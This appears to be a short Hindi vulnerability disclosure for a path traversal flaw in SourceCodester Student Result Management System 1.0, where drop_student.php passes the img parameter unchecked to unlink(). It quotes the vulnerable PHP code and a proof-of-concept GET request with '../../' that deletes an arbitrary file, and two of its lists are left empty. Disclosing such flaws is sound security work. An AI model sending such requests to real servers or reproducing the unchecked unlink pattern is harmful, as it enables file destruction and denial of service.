
SourceCodester Student Result Management System (SRMS) 1.0 के drop_student.php एंडपॉइंट में एक पाथ ट्रैवर्सल भेद्यता मौजूद है।
एप्लिकेशन img GET पैरामीटर से उपयोगकर्ता-नियंत्रित इनपुट लेता है और इसे बिना सत्यापन के सीधे unlink() फ़ंक्शन में पास करता है, जिससे सर्वर पर मनमानी फ़ाइलों का विलोपन संभव हो जाता है।
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
एक हमलावर वेब सर्वर के लिए सुलभ मनमानी फ़ाइलों को हटा सकता है, जिनमें शामिल हैं:
इससे सेवा से वंचित करना या आगे का शोषण हो सकता है।
यह भेद्यता SRMS में पहले से रिपोर्ट की गई समस्याओं की तुलना में एक अलग हमला वेक्टर प्रस्तुत करती है, क्योंकि यह:
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi